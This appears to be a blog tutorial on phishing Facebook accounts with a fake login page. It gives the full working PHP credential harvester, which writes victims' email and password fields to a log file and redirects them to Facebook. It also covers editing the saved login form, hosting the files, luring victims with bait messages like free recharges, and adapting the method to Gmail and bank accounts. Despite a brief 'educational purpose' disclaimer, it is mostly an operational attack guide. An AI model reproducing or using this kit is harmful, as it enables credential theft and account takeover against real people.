Hacking Facebook With Fake Login Page is called "
Phishing" and it is used by the hackers to
hack the user id and passwords of their victims. In this method, hackers
create fake login page which looks same as the login page of facebook and host the pages to any hosting site which supports php. Then they send the fake login page to the victim and tell them to login. They send these login pages with some exciting subjects such as
"login and get free recharges",
"login and win apple ipod" etc. When the victim sees such messages, he/she gets excited and logs in to the fake page immediately and without his knowledge, victim's user id and password is stored in the log file which hacker hosted with the fake login page. After getting the id and password of the victim, hacker changes it or misuses it.
So, I am going to explain you
how to create fake login page of facebook and hack the user id and password of your victim.
NOTE : This tutorial is only for educational purpose. Phishing is a crime and is a punishable act. Don't use it to hack and misuse anyone's password. Author of this blog and this blog will not be responsible for the misuse of the tutorial explained here.
Follow the steps given below:
> First of all you need to
save the facebook login page in your pc and change the form action in the page code. Open the login page in notepad or any other code editor and find the line
<form id="login_form" action and then change the php file name with your own file and save the html file. Here I am using
ashutoshthehacker.php.
> Now, you need to
create a php file to redirect the victim to any other page after login so that he will not be alert and you need to create another text file in which the id and passwords of the victim will be stored. I have created the php file (
ashutoshthehacker.php) and log text file (
ashu.txt)
> To create the php file, open a new file in your code editor and type the code exactly as given below:
<?php
header ('Location: https://www.facebook.com/careers');
$handle = fopen("ashu.txt", "a");
foreach($_POST as $variable => $value) {
if($variable=="email" || $variable == "pass")
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Here, you can change the url (
in lime color) as you wish, this is the address where victim will be redirected after login attempt.
> Now save it as
ashutoshthehacker.php (you can choose any name you want, but the name must be mentioned in the html file)
> Now create a text file named as
ashu.txt (you can choose any name but the name must be mentioned in the php file)
> Now, you are done. Collect all the files in a same folder and it's time to upload the phisher files to your file hosting site. (
I am not going to tell you which hosting site I am using, you must purchase some space for your own hosting or search for some free hosting sites)
NOTE : If you don't want to do this coding stuff, then you can download the files created by me. Click the link below to download the phisher files.
> Now, let's upload the files in ftp server.
Login to your file hosting account.
> Now,
upload your phisher files in your public www directory.
> Now, after uploading, you will see the list of uploaded files.
> Now, it's time to see our
fake page. Right click on the
facebook.htm file and click
view online. (Your file hosting site may have different option, just use common sense)
> The fake page will appear in the browser.
Copy it's url from the address bar. You need to
send this url to the victim. If victim logs in to this page, he will be redirected to the url you set earlier in the php file and his entered id and password will be stored in your log text file. I am testing the
fake facebook login page by entering username and password.
> See, after logging in, the victim will be
redirected to Facebook Careers page and his password will be stored in your
log text file (ashu.txt)
> To see the user id and password of the victim, just
open your log text file (
ashu.txt) and see.
> Here you go... The
user id and password is now hacked...!!
> I hope you have now learnt
how to hack anyone's facebook account using phishing. In the same way, you can hack gmail, yahoo and even any account by editing php file and creating fake login pages. Most of the bank users are hacked by this way because hackers send them mails saying the victim to login using their link to save their bank accounts from expiration. Victim gets afraid and logs in and then, he is hacked..!!
